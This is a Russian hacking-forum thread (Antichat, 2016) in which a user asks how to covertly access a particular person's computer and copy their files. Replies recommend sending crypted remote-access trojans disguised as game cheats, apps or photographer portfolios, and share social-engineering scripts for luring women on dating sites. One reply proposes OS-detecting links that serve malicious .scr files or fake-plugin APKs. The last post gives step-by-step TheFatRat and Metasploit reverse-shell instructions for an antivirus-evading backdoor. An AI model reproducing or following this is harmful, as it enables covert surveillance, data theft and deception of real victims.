ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Удаленный доступ к компьютеру (https://forum.antichat.xyz/showthread.php?t=441991)

Ruslan5 14.09.2016 22:20

Мне нужно создать удаленный доступ к компьютеру через интернет, управлять компом не обязательно и менять там тоже ничего не надо, и так чтоб владелец не знал. Точнее нужно всего лишь скинуть файлы с его компа. Есть только ссылка в соцсети, также знаю, что пользователь любит играть в игры всякие в вк (не знаю поможет это или нет) и фактический адрес проживания. ip адрес не знаю.

В общем нужен грамотный вариант как это сделать и не палится...

pw0ned 14.09.2016 23:42

Закинь под предлогом какого либо приложения или ещё чего либо закриптованную комету.

Dark~Angel 14.09.2016 23:51

Раньше мы кидали скрытый РМС ) Работал хорошо ! Помню, на сайте знакомств прикидывался фотографом и под этим предлогом кидал трой) Типо: "Посмотри на мои работы" )

trolex 15.09.2016 17:06

Цитата:

Сообщение от Dark~Angel

Раньше мы кидали скрытый РМС ) Работал хорошо ! Помню, на сайте знакомств прикидывался фотографом и под этим предлогом кидал трой) Типо: "Посмотри на мои работы" )

сколько девушек из десяти открывали?

Dark~Angel 15.09.2016 18:43

Цитата:

Сообщение от trolex

сколько девушек из десяти открывали?

80%+ Женщина наивное существо) Просто Я начинал с далека и медленно подводил жертву к крючку

trolex 15.09.2016 20:39

Цитата:

Сообщение от Dark~Angel

80%+

ничоси

видимо вся суть в твоём подходе, соц инженерия и всё такое,

был бы тебе очень благодарен, если бы скинул пример диалога, ну или хотя бы план, структуру, как подвести к вопросу фото сессии

Dark~Angel 15.09.2016 22:32

Цитата:

Сообщение от trolex

ничоси
видимо вся суть в твоём подходе, соц инженерия и всё такое,
был бы тебе очень благодарен, если бы скинул пример диалога, ну или хотя бы план, структуру, как подвести к вопросу фото сессии

Так там и есть соц. инжинерия ) Если можешь с незнакомой девушкой на улице познакомится то в сети раскритишь как "С добрым утром"

trolex 16.09.2016 03:04

Цитата:

Сообщение от Dark~Angel

Так там и есть соц. инжинерия ) Если можешь с незнакомой девушкой на улице познакомится то в сети раскритишь как "С добрым утром"

- привет я профессиональный фотограф, фотографирую для журналов, ты очень необычная, из тебя получились бы красивые снимки, давай сделаю тебе бесплатную фото сессию

- ну я не знаааааюююю....

- вот смотри примеры моих работ site.com/foto.scr

так норм?

Anwy 16.09.2016 09:26

Или к незнакомой:

Привет, я сфоткал тебя в маршрутке такой-то (смотришь в каком она городе и какие мартшрутки ходят) либо по отметкам вк/инсте и скидываешь фотку и говоршиь хотел бы познакомиться. Либо центральную улицу. ля-ля

Dark~Angel 16.09.2016 10:01

Цитата:

Сообщение от trolex

- привет я профессиональный фотограф, фотографирую для журналов, ты очень необычная, из тебя получились бы красивые снимки, давай сделаю тебе бесплатную фото сессию
- ну я не знаааааюююю....
- вот смотри примеры моих работ site.com/foto.scr
так норм?

Аха, но вместо профессиональный Я бы впоял "начинающий" хотя там от возраста зависит. Вот фишка в том что надо начать разговор с далека!) И смаое главное, писать уверенно и нагло )

Dark~Angel 16.09.2016 10:06

badoo.com-вот площадка для тренировок

Dark~Angel 16.09.2016 11:06

Цитата:

Сообщение от Anwy

Или к незнакомой:
Привет, я сфоткал тебя в маршрутке такой-то (смотришь в каком она городе и какие мартшрутки ходят) либо по отметкам вк/инсте и скидываешь фотку и говоршиь хотел бы познакомиться. Либо центральную улицу. ля-ля

Тоже классный вариант. Вот, давайте тут покидаем свои варианты. Взламывать надо не только компы )

Dark~Angel 16.09.2016 11:45

Цитата:

Сообщение от Matcal Koushek
Matcal Koushek said:

Как вариант, лохматый сейф ей взломайте.

Какая аватарка такие и ответы.

Dark~Angel 16.09.2016 11:51

Цитата:

Сообщение от Matcal Koushek
Matcal Koushek said:

Тогда предложи ей сыграть в Арагу-Пегу или в Буёк.

Под видом читов-накрутки можешь кинуть троянчика

Dark~Angel 16.09.2016 12:18

Был ещё вариант с сеоспринт. Мы делали связку вбскрипт+РМС. Ставили задание на просмотр видоса, человек качал файлик, открывал его и автоматом выбрасывался видосик с ютуба. Но тут главное было вовремя коменты удалять )

BlackMiay 16.09.2016 17:47

ssh+tor -> hidden service

Dark~Angel 16.09.2016 18:02

Цитата:

Сообщение от BlackMiay

ssh+tor -> hidden service

Этот то тут причём ?

trolex 16.09.2016 19:56

Цитата:

Сообщение от Dark~Angel

Взламывать надо не только компы )

ага, по статистике http://www.liveinternet.ru/stat/ru/oses.html компы 40% трафика, мобильные 60%, из них андроид 46%,

как заставить человека установить своё приложение?

вижу вариант с той же фоткой, при переходе по адресу фотки, выдаётся сообщение, ваш браузер устарел, обновите плагин / флэшплеер и ссылка на apk,

при загрузке ссылки на фото можно определять ОС устройства, если WIN - выдавать scr на скачку, если андроид - выдавать страницу с устаревшим плагином

Diadlo 17.09.2016 02:15

Он имел в виду людей

Ruslan5 18.09.2016 22:20

Цитата:

Сообщение от Matcal Koushek
Matcal Koushek said:

Что тогда подразумевается под управлением?

по сути нужно только скинуть файл, думал может есть разница между скидыванием файлов и полным управлением его настроек и всего прочего

Ruslan5 18.09.2016 23:12

Цитата:

Сообщение от Matcal Koushek
Matcal Koushek said:

Между настройками компьютера и скидывания файлов действительно разница есть.
Но, откуда вы взяли, что первое сложно, а второе чепуха?
Я не ворчу, я просто много лет хочу понять, из каких источников люди черпают такую инфу?
Где вы прочитали это? Если дадите ссылку, ещё одна загадка для меня будет решена.

ахах))) та не)) это стереотипы мои)))) хотелось бы осилить это, но где взять источники с подробной информацией?

Dark~Angel 21.09.2016 18:57

Цитата:

Сообщение от trolex

ага, по статистике
http://www.liveinternet.ru/stat/ru/oses.html
компы 40% трафика, мобильные 60%, из них андроид 46%,
как заставить человека установить своё приложение?
вижу вариант с той же фоткой, при переходе по адресу фотки, выдаётся сообщение, ваш браузер устарел, обновите плагин / флэшплеер и ссылка на apk,
при загрузке ссылки на фото можно определять ОС устройства, если WIN - выдавать scr на скачку, если андроид - выдавать страницу с устаревшим плагином

Хэх, с андройдом дела обстойхат намного круче. Много андройд устройств базируются на старх версиях с уязвимой начинкой. В метасплойте очень много прибомбасов для скрытойх установки АПК ))))

Shadow Stream 21.11.2016 16:33

Цитата:

Сообщение от Ruslan5

Мне нужно создать удаленный доступ к компьютеру через интернет, управлять компом не обязательно и менять там тоже ничего не надо, и так чтоб владелец не знал. Точнее нужно всего лишь скинуть файлы с его компа. Есть только ссылка в соцсети, также знаю, что пользователь любит играть в игры всякие в вк (не знаю поможет это или нет) и фактический адрес проживания. ip адрес не знаю.
В общем нужен грамотный вариант как это сделать и не палится...

|+| Чтобы контролить комп надо знать (основу) как устроена сеть . Дальше нужно выбрать Дистрибутив линукса и изучить его ( для таких целей посоветаю : https://backbox.org/).

|+| Изучить Metasploit (если трудно -> скачайте TheFatRat: https://github.com/Screetsec/TheFatRat) - немного проще , однако нужно попрактиковаться .

|+| Вам надо изучить: как устроен Backdoor, как обойти защиту вирусов (используй virustotal для проверки -> чтобы антивирусник не начал паниковать).

|+| Заходите в TheFatRat папку :

root@kali~:/Test/TheFatRat# chmod +x powerfull.sh

chmod +x fatrat

./fatrat


|+| Выбор :2 CREATE FUD BACKDOOR (SLOW BUT POWERFULL)

ifconfig
------------------ > SET LHOST IP: 192.168.1.5

SET LPORT: 8080


|+| Дальше перейдите в папку TheFatRat и найдите папку output (Там будет ваш backdoor -> Powerfull.exe). Теперь надо закинуть файл на компьютер (лучше помести в автозагрузку).

После этого :

root# /etc/init.d/postgresql start

msfconsole


------------------------------------------------------------------------------------

msf > use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

show options

set LHOST 192.168.1.5

set LPORT 8080

exploit


------------------------------------------------------------------------------------

meterpreter > help

sysinfo

screenshot

ipconfig


Выбирайте нужную функцию и действуйте ).

Советаю вам изучить ещё утилиту

Social Engineering Toolkit.

Желаю Успехов !


Время: 00:03